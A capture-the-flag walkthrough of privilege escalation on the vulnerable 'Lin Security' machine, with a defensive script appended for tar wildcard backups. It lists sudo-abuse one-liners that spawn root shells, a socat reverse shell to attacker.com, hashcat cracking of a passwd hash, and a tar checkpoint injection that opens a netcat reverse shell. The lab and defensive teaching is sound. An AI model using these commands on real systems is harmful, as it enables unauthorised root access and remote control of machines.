# Lin Security

## Exploitation

This machine does not need enumeration because the author already gave us credentials; it is meant to let us practice our privilege escalation skills.

![](/files/-M8E6ff0NJjffGd36Bgm)

After logging in with the credentials:

![](/files/-M8E78LIvTSEXJLtCQmj)

## Privilege Escalation

We can then run `sudo -l`:

![](/files/-M8E7T8hRRsxYLkg6-uc)

We can see a lot of sudo rights that can be exploited.

### Method 1 (User Rights)

We can go to the [GTFOBins website](https://gtfobins.github.io/) and get the cheat sheet from it. Most of these are very easy, so we are not going to cover everything.

#### /bin/ash

```
sudo ash
```

#### /bin/ed

```
sudo ed
!/bin/sh
```

#### /usr/bin/env

```
sudo env /bin/sh
```

#### /usr/bin/expect

```
sudo expect -c 'spawn /bin/sh; interact'
```

#### /usr/bin/find

```
sudo find . -exec /bin/sh \; -quit
```

#### /usr/bin/more

```
TERM= sudo -E more /etc/profile
!/bin/sh
```

#### /usr/bin/scp

```
TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
sudo scp -S $TF x y:
```

#### /usr/bin/socat

On our machine:

```
socat file:`tty`,raw,echo=0 tcp-listen:12345
```

On the target machine:

```
sudo sh -c 'cp $(which socat) .; chmod +s ./socat'

RHOST=attacker.com
RPORT=12345
./socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane
```

#### /usr/bin/ssh

```
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
```

#### /usr/bin/pico

```
sudo pico
^R^X
reset; sh 1>&0 2>&0
```

#### /usr/bin/rvim

```
sudo rvim -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
```

#### /usr/bin/tclsh

```
sudo tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr
```

#### /usr/bin/git

```
sudo git -p help config
!/bin/sh
```

### Method 2 (Password Hashes)

When we `cat /etc/passwd`, we can see all the users on the system, and we can see that one user has a password hash in the file.

![](/files/-M8EIu3PgJyhhqMoezQ2)

Feed the hash to hashcat to crack it:

```
hashcat AzER3pBZh6WZE -m 1500 /usr/share/wordlists/rockyou.txt
```

![](/files/-M8EJ2yXuZKC795_mSMn)

With the password recovered, we `su` to the user `insecurity`, and then we can get root.

![](/files/-M8EJGKnRUHLezb6KUQk)

### Method 3 (Cron Jobs)

If we run `cat /etc/crontab`, we can see that a backup job runs every 1 minute.

![](/files/-M8ELWe6_QTrmtZGnkDr)

If we run `ls -la /etc/backups`:

![](/files/-M8ELysA_7TuIZSTzqHf)

We can see the tar file. The article on this [website](https://in.security/lin-security-walkthrough/) has a very detailed explanation.

On our machine:

```
nc -nlvp 9999
```

On the target machine:

```
echo "mkfifo /tmp/lhennp; nc 192.168.1.102 9999 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
tar cf archive.tar *
```

After waiting 1 minute, we get a shell.
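The trick in Method 3 works because the shell expands `*` into file names before tar runs, and tar parses any name starting with `-` as an option. The script below is an added example (not part of the original walkthrough or of the machine's cron script) showing how a defender can spot such names and write the backup so they stay plain file names; the function names `option_like_names` and `safe_backup` and the demo files are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: audit and harden a wildcard tar backup (function names are hypothetical).

# Print every entry in directory $1 whose name starts with "-".
# An unquoted * in that directory hands these names to tar as options.
option_like_names() {
    (
        cd "$1" || exit 1
        for f in -*; do
            # The "./" prefix keeps test(1) from reading the name as an operator.
            if [ -e "./$f" ]; then printf '%s\n' "$f"; fi
        done
    )
}

# Archive the contents of directory $1 into $2 (absolute path outside $1).
# Globbing ./* makes every argument start with "./", so tar can only treat
# it as a file name, never as --checkpoint or any other option.
safe_backup() {
    (
        cd "$1" || exit 1
        tar cf "$2" ./*
    )
}

# Constructed demo: a directory holding the file names used in Method 3,
# with a harmless shell.sh that would only leave a marker file behind.
demo() {
    d=$(mktemp -d)
    out=$(mktemp)
    echo 'touch TRIGGERED' > "$d/shell.sh"
    : > "$d/--checkpoint=1"
    : > "$d/--checkpoint-action=exec=sh shell.sh"
    echo "option-like names found:"
    option_like_names "$d"
    safe_backup "$d" "$out"
    echo "archive members:"
    tar tf "$out"
    if [ -e "$d/TRIGGERED" ]; then echo "action ran"; else echo "action did not run"; fi
    rm -rf "$d" "$out"
}

if [ "${1:-}" = demo ]; then demo; fi
```

Run it with the argument `demo` to see the constructed case; in a real backup job, keeping the archive outside any user-writable directory and using the `./*` form removes the option-injection path.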

